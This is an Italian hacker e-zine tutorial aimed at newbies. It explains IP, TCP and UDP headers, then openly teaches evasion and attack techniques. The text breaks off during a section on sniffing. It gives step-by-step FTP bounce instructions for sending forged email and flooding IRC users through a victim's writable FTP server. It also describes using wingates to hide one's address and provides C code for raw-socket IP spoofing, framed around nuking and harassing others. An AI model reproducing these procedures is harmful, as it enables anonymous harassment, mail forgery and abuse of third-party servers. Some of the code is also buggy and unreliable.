Musica ascoltata: (Get your gunn, Cake and Sodomy, Antichrist Superstar
Remix & Repent, I don't like the drugs, Sweet
Dreams, The Horrible People, The dope show,
Great Big White World, Mechanical Animals,
Rock is dead)-Marilyn Manson, Freak on a leash-Korn,
Narcotic-Liquido, Pretty Fly-offsping e Domenica e Luned
di Branduardi.

Saluti: mR_bIs0n, ZeroCool, il BFi Staff (mitici, sempre cos), il NewBies
staff (togliete per• gli articoli su bo e netbus :)) e Slurpzann,
nonch‚ un omaggio a Raoul Chiesa.

Fuck a: Telekom, il mio preside, la mia skuola (vi ho fottuto l'abbonamento),
Daniela (Marilyn Manson non fa skifo...(la musika, intendo)),
al gruppo del Timone e a chi mi ritiene malato di mente....

Barzelletta: Fidati, Š un prodotto Microsoft©.

------------------------Indice

0) Disclaima
1) IP
2) TCP & UDP, protocolli
3) Gateways & socks firewalls
4) FTP Bounce
5) Spoofing
6) Sniffing
7) Hijacking
8) Conclusione

------------------------0) Disclaima

ATTENZIONE! NON MI ASSUMO UN CACCA DI RESPONSABILITA' PER L'USO CHE FARETE
DI QUESTE INFORMAZIONI, QUINDI, C@221 VOSTRI.

Inoltre, questo articolo Š scritto da un newbie per una rivista per newbies.
Se troverete scontate molte cose da me scritte, abbiate pazienza.
Per gli amici del gruppo "IL TIMONE": Queste informazioni mi sono state
rivelate dalla Sun Microsystems, che mi sta pagando per fare pubblicitÂ…
anti-microsoft (WINDOWS NON CONOSCE I RAW). Inoltre ho scritto questo articolo
solo perch‚ Zero e Nobody mi hanno promesso una cospiqua sommetta in cambio.

per emailarmi: bgates@microsoft.com (scherzo ovviamente...)
il mio sito web: www.fbi.gov (come sopra)

------------------------1) IP

Cos'Š un indirizzo ip? Bene, lo spiego velocemente perch‚ Š bello...
allora, avete mai visto quando inserite un sito (ad es. www.microsoft.com)
nel vostro browser preferito e premente invio uscire sulla barra dello stato:
[Ricerca del sito in corso]
[Sito web rilevato (o kualkosa di simile...)]
[Connessione a 201.31.26.66]
da bravi osservatori? Se no, MALE! :) allora, in questo kaso, ke kosa Š
201.31.26.66? Bene, Š quello l'indirizzo ip... Tutti i computerz in rete
hanno un indirizzo ip, anke voi! Infatti, il vostro provider (nota per
Eduardo Freni: proVider, e non proVVider, ma che lo leggi anche come
sta scritto????) vi assegna un indirizzo ip appena entrate, in modo che anche
voi possiate far parte della RETE.
Come Š fatto un indirizzo ip? Un indirizzo ip Š un numero a 32 bit suddiviso
in 4 blocchi da 8 (se prendiamo 255 in binario diventa 11111111, ma anche 0
da considerare un binario a 8 cifre, cioŠ 00000000, Š inutile che vi dica
che ogni cifra corrisponde ad un bit, vero??? :))separati da punti e che
spaziano da 0 a 255, ma approposito, i numeri 0 e 255 sono in genere
riservati, kuindi si pu• dedurre che vedremo numeri spaziare da 1 a 254...
Ora direte(?): ma come si fa da un indirizzo ip numerico a prendere il nome
del "proprietario" (il proprietario Š un server, ad es. 66.66.6.6 ->
i.am.an.all.american.antichrist) e viceversa?
Basta usare il DNS, ovvero il Domain Name Server, che da un ip numerico
ricava il nome dell'host e dal nome dell'host ricava l'ip numerico,
naturalmente dovete sapere almeno uno di questi due per farvi rivelare l'altro
(eheheh, elementare, Wazzon). Inoltre qualsiasi OS che io conosca, prende
l'ip 127.0.0.1 come proprio, quindi quando sul nukenabber esce: Un koglione
tenta di nukarti sula 139 dall'ip 127.0.0.1, beh, non rispondere al nuke: quel
coglione sei tu :) Ma come fa quello che ti nuka a cambiare il suo indirizzo
ip con quello locale di ognuno e con altri?
Vedremo pi— avanti, ora approfondiamo meglio il concetto di IP non come
indirizzo, ma come quello che Š: un INTERNET PROTOCOL.
Skemino:
0 15 16 31
ÉÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» Í»
º 4 bit º 4 bit º 8 bit TOS º 16 bit Total Lenght º º
ºversion ºhead.lenºType of service º In bytes º º
ÌÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º 16 bit º3 bit º 14 bit º º
º Identification ºflags º fragment offset º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Ì 20
º 8 bit TTL º 8 bit º 16 bit º ºbytes
º Time To Live º protocol º Header Checksum º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º 32 bit º º
º Source IP Address º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º 32 bit º º
º Destination IP Address º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ͼ
º Options º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º Data º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Questo Š lo skemino dell'header IP, che si attakka come una sanguisuga su
qualsiasi pakketto ke voi mandiate...
Cercate di imparare bene codesto skemino (lo trovate dappertutto,
pure sul ricettario di nonna Amelia), vi sar… molto utile pi— avanti nella
vita (mai quanto le bombe di Jolly Roger :)

------------------------2) TCP e UDP, protocolli

Inizio kol dire ke il TCP e l'UDP sono i protocolli di rete pi— diffusi,
ma ne esistono anche altri (RAW su tutti: viva lo spoof!). Il TCP Š quello
usato da altri protocolli come HTTP, FTP, SMTP ecc ecc. mentre l'UDP Š
pi— usato nelle nuke (quelle che vi hanno fatto tanto bestemmiare su
Brufolo Bill©).
Bisogna dire ke senza TCP il protocollo TCP/IP rimarrebbe IP(ma va'?) e
kome tale diventerebbe inaffidabile, cioŠ:
io spedisko 20 pakketti ip contenenti un file frammentato ad un altro:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

il protocollo IP non ricordando l'ordine in cui i pacchetti sono stati
spediti, facendo arrivare magari cos:

17 2 20 1 6 10 16 19 8 3 7 13 18 15 4 11 5 9 12 14

o magari

1 5 6 20

Beh? E allora quello kome fa a sapere qual Š il primo pacchetto inviato e
quale l'ultimo? O peggio... Š arrivato il pakketto?
Non pu• funzionare un ftp cos!

Ma se noi attakkassimo un pakketto tcp ad un header ip???
Ecco l'header TCP (AAARGH! UN'ALTRA TABELLA!!!):

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» Í»
º 16 bit º 16 bit º º
º Source Port Number º Destination Port Number º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º 32 bit º º
º SEQence Number º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º 32 bit º Ì 20
º ACKnowledgement Number º ºbytes
ÌÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º4 bit º 6 bit º 6 bit º 16 bit º º
ºHead.Lenº Reserved º Flags º Window size º º
ÌÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º 16 bit º 16 bit º º
º Checksum º Urgent pointer º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ͼ
º Options º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º Data º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Bene, combinato all'ip dovremmo avere:

min. 20 bytes di header IP + min. 20 bytes di header TCP + data, ma bisogna
considerare che un pacchetto TCP/IP non pu• superare la soglia dei 65535 bytes
(vi ricordate il Ping Of Death???).
Ora, torniamo al problema dell'ordine dei pakketti: avete visto quel sequence
number (ho evidenziato SEQ perch‚ in molti sniffer Š per brevit… cos
mostrato, poi vedremo pi— avanti)? Bene, con il sequence number il ricevente
saprÂ… benissimo quale pakketto viene prima e quale dopo.

L'ACK Š in vece il riconoscimento, ed Š dato dal precedente SEQ del ricevente
+ il numero di bytes che questi ha inviato, mentre il SEQ Š il precedente ACK
del ricevente... ke kasino, vero? Comunque vi ci abituerete... (io ancora non
mi ci sono abituato).

Bene, il discorso kambia quando si stabilisce una connessione.
Chiamiamo un client A, un server B:
A--->B SEQ:1118358509 ACK:0
B--->A SEQ:4143819233 ACK:1118358510
A--->B SEQ:1118358510 ACK:4143819234

(NUMERI PRESI DALL'ARTICOLO DI FuSyS, Progetto 0N0S3NDAi, BFi no.4 :))
Questo processo Š chiamato 3-Way Handshake, A manda un SEQ a B, ACK
naturalmente 0, B risponde con un suo SEQ e con l'ACK di A incrementato di 1,
ed A per confermare risponde con come SEQ l'ACK di B, e come ACK il SEQ di B+
1, tutto chiaro? (a me no...)

E da qui inizia la comunicazione.

Per il protocollo UDP, kambia kualkosa...
Il protocollo UDP infatti non stabilisce di una connessione, come il TCP,
ha un header pi— pikkolo ed Š leggermente pi— veloce...
Volete un'altra tabella? Mi dispiace, ma momentaneamente non dispongo di
schemi di pacchetti UDP, cos cercher• di riassumere testualmente.
Un pacchetto UDP Š cos composto: 16 bit source port, destination port,
16 per header lenght + reserved + flags e 16 per il checksum.
NB: per i bit mi sono basato sul fatto che erano shorts, il che vuol dire
intero a 16 bit, da 0000 a FFFF (0 a 65535) (il numero massimo di porte), il
checksum Š di 16 sicuramente, mentre non sono sicuro per la lunghezza: Š solo
quella dello header o Š di tutto il pacchetto??? Dovrebbe essere a 16 bit,
essendo uno short, ma negli altri protocolli l'header lenght Š di 4...
Vabb‚, nel prossimo numero cercher• di mandarvi la risposta... 8(

Ora, tralasciando l'UDP (se non volete spoofare per nukare kualkuno non ve ne
importer… pi— di tanto), sappiamo che il Source Address (indirizzo sorgente)
Š nell'intestazione IP, mentre la Source Port Š nella TCP giusto?
Vedremo pi— avanti (vedi SPOOFING) come si mandano pacchetti spoofati.

Ed ora, se non volete che nessuno sappia il vostro vero IP su IRC, ecco i...

------------------------3) Gateways & socks firewalls

Cosa Š un gateway? Qualcuno sul numero 3 di Newbies aveva detto:
Mettiamo che Gambadilegno voglia insultare Topolino, senza per• fargli sapere
di essere stato lui, cosa fa?
Va da Pippo (il pi— scemo) e gli dice: senti, vai da Topolino e digli:
"@'^!##" (o qualcosa di simile (non ricordo)) e dimmi cosa ti risponde.
Allora Pippo, che Š molto idiota, va da Topolino e gli dice:
"@'^!##" (rimango nell'incertezza tuttora).
Topolino allora gli risponde:
"Senti Pippo, io sono sempre molto calmo e tranquillo, ma se mi dici queste
cose alla fine mi farai arrabbiare..."

Pippo, che non ha capito nemmeno cosa ha detto Topolino, torna da Gambadilegno
e gli dice (per emulazione dei suoni) quello che gli ha detto Topolino.

Vedete, prendiamo come Gambadilegno il client A, come Pippo un server dotato
di wingate, chiamato B, e come Topolino un altro server, magari
tin.it, tale C.

Allora, una volta che A si connette a B (in genere sulla 8080), si troverÂ…
davanti il prompt:

Wingate>

Che pu• fare? Vi konnettete da qui ad un altro server e l'ip loggato sar…
quello del wingate o netgate (o stargate ;)) che dir si voglia...

Un socks invece firewall come si usa? Il firewall Š usato in genere per
connettersi ad IRC da un ip non proprio (pi— o meno per lo stesso skopo dei
gateways...) e mandare a 'ffanculo tutti coloro che tenteranno di nukare un
server... Per utilizzarlo prendiamo il nostro klient IRC di fiducia (mIRC,
usato dalla maggioranza), andiamo ad Options->Firewall e selezioniamo "Use
socks Firewall"
come host ci mettiamo il Server B e come socks va bene anche
il 4, port la porta, et ualÂ… (oddio...), il gheim est fatto (sono un
poliglotta), nel senso che potete benissimo clickare su Connect, e i vostri
messaggi "rimbalzeranno" prima sul server B e poi arriveranno a C, quindi,
se uno vi fa un DNS, al massimo vi fotte il firewall ;)

Come avrete intuito (spero, altrimenti ve lo spiego io), il passaggio pi—
difficile Š TROVARE il server B. Esistono appositi scanner per Wingate,
mentre se volete un firewall e se proprio non volete perdere tempo andate su
un canale warez o per pedofili (maledetti!) & co., vedete le mask degli users,
e almeno uno di essi sarÂ… un paranoico che per non essere bekkato entra in
quei canali usando un firewall... Chiaro il concetto????

Bene, ora vedremo come fare altri skerzetti di questo tipo con una tecnica
"rivelatami dalla Sun" ( :))) detta...

------------------------4) FTP Bounce

Bene, sapete tutti cosa Š un ftp, vero? Occorre dire (almeno ad alcuni non
proprio bravi con l'inglese) che bounce vuol dire "rimbalzo". Rimbalzo FTP?
Cos'Š, si mangia? No. Avete un ftp uploadabile? EHEHEH, SAPETE COME SI
RITIRANO I FILES? Vabb‚, iniziamo dall'inizio (urka...)

Quando un ftp trasmette un file ad un computer remoto, lo fa in base all'ip
e alla porta specificata previamente. Non avete mai visto un client ftp in
funzione? (se no, perch‚ cavolo leggete questo articolo??? :)) Se Š un client
munito di status-bar o ke vi fa vedere i comandi, quando ritirerete un file
vedrete: PORT xxx,xxx,xxx,xxx,y,z dove le x sono il vostro indirizzo IP
(intervallato per• da ',' e non da '.'), mentre la y Š un numero che non ci
interessa, e la z Š la porta sulla quale il client si appresta a ricevere il
file. Dopodicch‚ vedrete il comando RETR xxxxxxxx dove xxxxxxxx Š il nome del
file che volete ritirare.

Il comando PORT serve a dire al server a quale host:porta deve sendare il
file, ed il client ftp lo usa per dare il nostro ip e la nostra porta.
Ma se noi usassimo ad esempio:
PORT 111,222,33,44,0,21
RETR Goofyfuckedbymickey.jpg
che accadrebbe???? Semplice, il server ftp anzikk‚ mandare a noi il file, lo
manda all'host 111.222.33.44 sulla porta 21 (ftp, ma si possono usare anche
altre porte), cos il file Goofyfuckedbymickey.jpg (eheheh, come mi Š venuto
'sto nome???) verrÂ… copiato anche sull'ftp 111.222.33.44 (certi files sono
imperdibili :) ) (anzi, non verr… copiato perch‚ ci vuole user e pass e stor
ecc...).
Se siete abbastanza makkinosi avrete giÂ… capito quali siano le cosette che si
possono fare con questo stratagemma. Comunque, continuate a leggere.

Se voleste mandare una fakemail a qualcuno (suppongo che sappiate come si
faccia, ma in caso contrario i comandi sono commentati) senza che il vostro
ip compaia minimamente nella suddetta, bene, allora potete fare cos:

create un nuovo file contenente i comandi per l'SMTP (server che invia posta),
ad esempio:

HELO ftpvittima.com [saluta l'SMTP identificandosi come il
server che usate per bounciare]
MAIL FROM: <bgates@microsoft.com> [imposta l'indirizzo mail mittente
come quello che ci mettete fra le <>]
RCPT TO: <lamer@lameronline.it> [indirizzo del ricevente]
DATA [inizio del corpo della mail]
[tutte le cose che ci vanno, gli headers, ecc.]
Muori lamerone!
. [un punto su riga vuota termina il
data]
QUIT [quitta dall'smtp]

bene, ed ora in teoria si potrebbe mandare all'smtp via bounce, ma Š di regola
incrementare le dimensioni del file a circa 60 kilobytes, per non far cadere
inspiegabilmente la connessione...

per fare ci• editate un file contenente 60000 spazi (provateci...) oppure
utilizzate il debug in questo modo:
[NOI] C:\>debug nomedelfileconi60000spazi
[PC] File non trovato
[NOI] -f 100,F000,0
[NOI] -rcx
[PC] :0000
[NOI] -EA60
[NOI] -w
[PC] Scrittura di EA60 bytes in corso...
[NOI] -q

bene, dovremmo aver creato un file chiamato nomedelfileconi60000spazi lungo
all'incirca 60k e pieno di " " (spazi).

ora si fa un copy /b filedeicomandi+nomedelfileconi60000spazi cmds
et voilÂ…! Ecco il file cmds lungo 60k ma con i comandi all'interno.
Ed ora, come utilizzare questo file???
1) Prendete il vostro client ftp preferito e mettete sul server vittima il
file "cmds" o come l'avete chiamato (naturalmente il server deve essere
uploadabile...)
2) Prendete il vostro client telnet preferito e connettetevi al server vittima
sulla porta 21 (ftp).
3) Ora scrivete PORT xxx,xxx,xxx,xxx,0,25 (le x sono l'indirizzo ip del server
mail, se non lo sapete allora fate un DNS, mentre 25 Š per SMTP, lo 0 lo
lasciate cos)
4) Ed infine RETR cmds (fa inviare all'ftp il file cmds all'indirizo e alla
porta specificate con PORT)

Che succede? L'ftp si connette al server SMTP e gli inizia a mandare il file
cmds e l'smtp prende i caratteri ascii esattamente come se fosse un telnet o
un client per e-mail ad inviarli. Volete un altro esempio???
Editate un file contenente:
USER Pippo
NICK Pippo
PRIVMSG Topolino :@'^!## @'^!## @'^!## @'^!## @'^!## @'^!## @'^!## @'^!##

L'ultima riga dovete ripeterla pi— volte... Oppure se conoscete bene i comandi
IRC potete fare molte altre cosette, questa serve solo a far dire a Topolino
la parola @'^!## ripetutamente da Pippo, che Š il nostro ftp di fiducia :)
Nulla ci vieta di floodarlo di DCC o di mandargli ping in continuazione...
Per• fate 'ste cose solo in casi veramente necessari
Comunque, aggiungete i soliti 60k, inviate al server e con il solito
procedimento (PORT 194,243,155,43,0,6666 per connettervi a irc.tin.it sulla
6666 e poi RETR nomedelfileconicomandi) e tutto funzionerÂ… (se non avete
sbagliato niente o se non ho sbagliato niente io .. :P).

NOTA IMPORTANTISSIMA LEGGETELA:
In alcuni casi pu• essere meglio utilizzare il comando:
quote "port xxx,xxx,xxx,xxx,y,z"
invece di PORT solamente. Vi ho avvisati, chiaro?????

Ok, ok, bello sto ftp bounce, ma come cacca si fa a vedere le risposte? Non si
pu•, l'ftp Š quel che si pu• definire un attacco cieco. Ma ora vediamo lo...

------------------------5) Spoofing

Lo spoofing Š una tecnica che ci permette di inviare pacchetti di qualsiasi
genere che sembrano provenire da un determinato indirizzo quando invece
vengono da tuttaltra parte... Provate a nukare qualke rompikollo dall'ip di
fbi.gov (eheheh). Comunque non voglio trattare di nukes et similia, ma
cercher• di illustrarvi i diversi tipi di attacco spoofato.
Ci sono due tipi di attacchi: quelli "ciechi" e quelli che ci permettono di
vedere le risposte, "sniffando" dal server vittima all'ip che usiamo per
spofare.

Come si fa a mandare un pacchetto spoofato?

Beh, ci sono modi e modi. Da Unix & Company Š molto facile: basta creare un
socket RAW (un socket *molto* grezzo) e lavorarlo mettendoci sopra degli
header IP e TCP (ma anche UDP o ICMP) non standard, cioŠ come quelli che si
trovano nelle librerie net*. Infatti, nel nostro header IP dovremmo mettere
anche l'ip del mittente, cosa che invece con le normali funzioni di sending
viene automaticamente fatta dal protocollo usato.

In principio si crea un bell'header ip tipo:

struct ipheader {
unsigned char verlen, tos; //versione+lunghezza header, tipo
unsigned short lenght, identification, flageoffset; //lunghezza, id, flags+offset
unsigned char ttl, protocol; //time to live, protocollo utilizzato
unsigned long int source, destination; //indirizzo ip sorgente, destinazione
};

ecco, bello vero?
Se esaminate attentamente vedrete:

* un char (8 bit) che include sia la versione ip che la lunghezza dello
header (contenitori a 4 bit non li so trovare io in c...)

* un char (8 bit) per il tipo di servizio (TOS)

* uno short (16 bit) per la lunghezza, uno per l'identificazione e uno
che include i 3 bit dei flag e i 13 del fragment offset

* un altro char per il time to live, ovvero su quanti server pu• passare
prima di fermarsi

* un altro char che identifica il protocollo

* due long (32 bit) che identificano l'ip sorgente e quello di destinazione

bene, non Š uguale allo skemino del cap. 1?
Per agevolarci ora creeremo uno pseudo ip header:

struct pseudoipheader {
unsigned long int source, destination;
char byte_zero, protocol;
unsigned short TCP_UDP_lenght;
};

qui

  
abbiamo l'ip sorgente, destinazione, il byte zero, il protocollo
utilizzato e la lunghezza del tcp o dell'udp.
Ora veniamo ai protocolli TCP e UDP:

struct tcpheader {
unsigned short source, destination;
unsigned long int seq, ack;
unsigned short offset_flags, window, checksum, urgent;
};

da notare che i source e i destination sono non degli indirizzi, ma delle
porte (short a 16 bit), qui dovete mettere la porta sorgente e quella
destinazione, insomma. Poi c'Š il SEQ e l'ACK, interi a 32 bit, e infine
abbiamo l'header lenght + reserved + flags, window, il checksum e l'urgent
pointer.
Ecco qui anche quello dell'udp, giusto per facilitarvi la vita :)

struct udpheader {
unsigned short source, destination, lenght, checksum;
}
Tutto chiaro no? E per finire si crea uno struct di scambio di dati spoofati,
anche questo per facilitarci la vita...

struct spdataexchange {
int fd;
char *data;
int datalen;
char *source;
unsigned short sourceport;
char *destination;
unsigned short destinationport;
unsigned long seq, ack;
unsigned short flags;
char *buffer;
int ip_optlen, tcp_optlen;
}

In questo struct copieremo i dati ip e tcp e tutto il resto, per poi scriverlo
sul pacchetto da inviare...
Ora, come facciamo ad inviare un pacchetto??? Creeremo una funzione detta
sendsppacket:

void sendsppacket(struc spdataexchange *sp, unsigned char protcollo)
{
int sp_status;
struct sockaddr_in *sp_serv;
struct hostent *sp_help;
int HEADER_BASE;
bzero((char *)&sp_serv, sizeof(struct sockaddr));
sp_serv.sin_family = AF_INET;
sp_serv.sin_addr.s_addr = inet_addr(sp->destination);
if(sp_serv.sin_addr.s_addr==(unsigned int)-1)
{
if(!(sp_help=gethostbyname(sp->destination)))
fprintf(stderr,"unknown host %s\n",sp->destination), exit(1);
bcopy(sp_help->h_addr,(caddr_t)&sp_serv.sin_addr,sp_help->h_lenght);
}
switch(protocollo)
{
case TCP: HEADER_BASE = TCP_HEADER_BASE; break; //Spiego sotto questi passaggi
case UDP: HEADER_BASE = UDP_HEADER_BASE; break;
case default: exit(1); break;
}
sp_status = sendto(sp->fd, (char *)sp->buffer, sp->datalen+HEADER_BASE+
IP_HEADER_BASE+sp->ip_optlen, 0, (struct sockaddr *)&sp_serv,
sizeof(struct sockaddr));
if((sp_status < 0) || (sp_status!=sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen))
{
if(sp_status < 0)
perror("sendto()\n"), exit(1);
printf("Trasmessi soltanto %d bytes di %d\n", sp_stat, sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen);
}
}

Bene, con questa funzione mandiamo i pacchetti che abbiamo creato... Dopo i
procedimenti di routine si tenta di risolvere l'host di destinazione, se non
si riesce si esce (splendido gioco di parole...), se invece l'host esiste
si copia nel "sp_serv.sin_addr". Poi si vede il protocollo: TCP e UDP ve li
definite prima con #define (TCP 6 e UDP 17), se Š tcp l'header_base sar…
ovviamente la lunghezza della dimensione minima dell'header tcp(20), se Š udp
quella dell'udp (8) e se Š altro esce :), l'ip Š 20. Poi si manda il pacchetto
spoofato realizzato prima, e si vede se il risultato Š positivo o meno, quanti
bytes sono stati inviati, eccetera. La lunghezza naturalmente Š la lunghezza
dei dati+l'HEADER_BASE definito prima+la lunghezza dell'header ip (20) + la
lunghezza delle opzioni ip. 500 righe! Uff! Che fatica... Dovremmo esserci...
Per fixare i vostri header IP e TCP, ci sono due pratiche(ALLA FACCIA!)
funzioni:

void sp_fix_IP_packet(struct spdataexchange *sp, unsigned char protocollo)
{
struct ipheader *sp_help_ip;
int HEADER_BASE;
switch(protocollo)
{
case TCP: HEADER_BASE = TCP_HEADER_BASE; break;
case UDP: HEADER_BASE = UDP_HEADER_BASE; break;
case default: exit(1); break;
}
sp_help_ip = (struct ipheader *)sp->buffer;
sp_help_ip->verlen = (IP_VERSION << 4) | (IP_HEADER_BASE+sp->ip_optlen+sp->tcp_optlen);
sp_help_ip->tos = 0;
sp_help_ip->lenght = htons(IP_HEADER_BASE+HEADER_BASE+sp->ip_optlen+sp->tcp_optlen+sp->datalen);
sp_help_ip->ID = htons(12545);
sp_help_ip->flageoffset=0;
sp_help_ip->ttl = 69; //miseria! Non deve morire prima del previsto...
sp_help_ip->protocol = protocollo;
sp_help_ip->source = sp_getaddrbyname(sp->source);
sp_help_ip->destination = sp_getaddrbyname(sp->destination);
sp_help_ip->checksum = in_cksum((unsigned short *) (sp->buffer),
IP_HEADER_BASE+sp->ip_optlen);
}

Questa Š per l'ip... Š molto intuitiva, Š inutile che ve la spieghi.
Attenzione, la funzione sp_getaddrbyname(char *) non ve la scrivo, ve la
spiego brevemente:
usate un HOSTENT, nel caso in cui l'host debba andare risolto. Se
l'host Š gi… numerico, si verifica l'esistenza e si ritorna il valore long
della medesima. Se invece non Š numerico, tentiamo di risolverlo e se ci
riusciamo si pu• benissimo ritornare il valore long dell'host, altrimenti
si da come risultato 0.
Per fixare l'header TCP:

void sp_fix_TCP_packet(struct spdataexchange *sp)
{
char *pseudo_ip_construct[1500];
struct tcpheader *sp_help_tcp;
struct pseudoipheader *sp_help_pseudo_ip;
int i;
for(i=0;i<1500;i++)
pseudo_ip_construct[i]=0;

sp_help_tcp = (struct tcpheader *) (sp->buffer+IP_HEADER_BASE+sp->ip_optlen);
sp_help_pseudo_ip = (struct pseudoipheader *) pseudo_ip_construct;

sp_help_tcp->offset_flags = htons((((TCP_HEADER_BASE+sp->tcp_optlen)/4)<<12) | sp->flags);
sp_help_tcp->seq = sp->seq;
sp_help_tcp->ack = sp->ack;
sp_help_tcp->source = htons(sp->sourceport);
sp_help_tcp->destination = htons(sp->destinationport);
sp_help_tcp->window = htons(0x7c00);

sp_help_pseudo_ip->source = sp_getaddrbyname(sp->source);
sp_help_pseudo_ip->destination = sp_getaddrbyname(sp->destination);
sp_help_pseudo_ip->zero_byte = 0;
sp_help_pseudo_ip->protocol = TCP;
sp_help_pseudo_ip->TCP_UDP_lenght = htons(sp->datalen+TCP_HEADER_BASE+sp->tcp_optlen);

memcpy(pseudo_ip_construct+12,sp_help_tcp,sp->datalen+TCP_HEADER_BASE+sp->optlen);
sp_help_tcp->checksum = in_cksum((unsigned short *)pseudo_ip_construct,
sp->datalen+12+TCP_HEADER_BASE+sp->tcp_optlen);
}


Ecco qua! Ultimo appunto: la in_cksum Š una funzione che potete trovare
dappertutto, anche sul ping.c o su uno dei vari nuker... Non mi dilungo anche
sull'UDP (ma questa Š discriminazione razziale! :)), anche perch‚ se conoscete
bene il C (spero, altrimenti che avete fatto, avete letto fin qua senza capire
un c***o???) Š molto intuitiva da realizzare... Se rimanete nel dubbio, per•,
leggetevi i sorgenti di spoofit.h, una libreria che mi ha ispirato non poco.
Non ricordo il nome dell'autore, un attimo... Ah, si: Bretch Claerhout.

NOTICINA: se non vi va di scrivervi gli header ip, tcp e/o udp a da soli, li
potete semplicemente aggiungere queste righe all'inizio del codice :)

#include <netinet/ip.h> //contiene lo struct per lo header ip
#include <netinet/tcp.h> //contiene quello per il tcp
#include <netinet/udp.h> //e quello per l'udp

ma se ve l'avessi detto prima avreste potuto comprendere come Š formato un
header ip???

Bene, ora, se avete imparato a spoofare, vi chiederete: come si fa a vedere le
risposte che ci manda l'host vittima??? Dobbiamo fare tutto a caso? Beh, in
effetti se sapete prevedere bene le risposte del server potreste farlo,
ma esiste un'altra tecnica, per leggere dei pacchetti non propriamente
destinati a noi... Ecco a voi lo

------------------------6) Sniffing

Non mi dilungo molto sullo sniffing. C'Š per• da dire che sniffare un
pacchetto Š diverso che sniffare cocaina ed ha risultati meno disastrosi (a
meno che non sniffiate un pacchetto di cocaina :D ). Se volete approfondire
questa tecnica, vi consiglio di leggervi sia la spoofit di Bretch Claerhout
che il file sniffit.c, i sorgenti dello sniffer sempre del suddetto.
Oppure vi consiglio di prokurarvi uno sniffer preconfezionato, tanto cercando
su astalavista.box.sk avrete solo l'imbarazzo della scelta...
Lo sniffing opera solo su reti ethernet, quindi non pensate di mettervi a
sniffare fbi.gov se non siete nella sua subnet...
Se prendete uno sniffer, potrete avere risultati simili

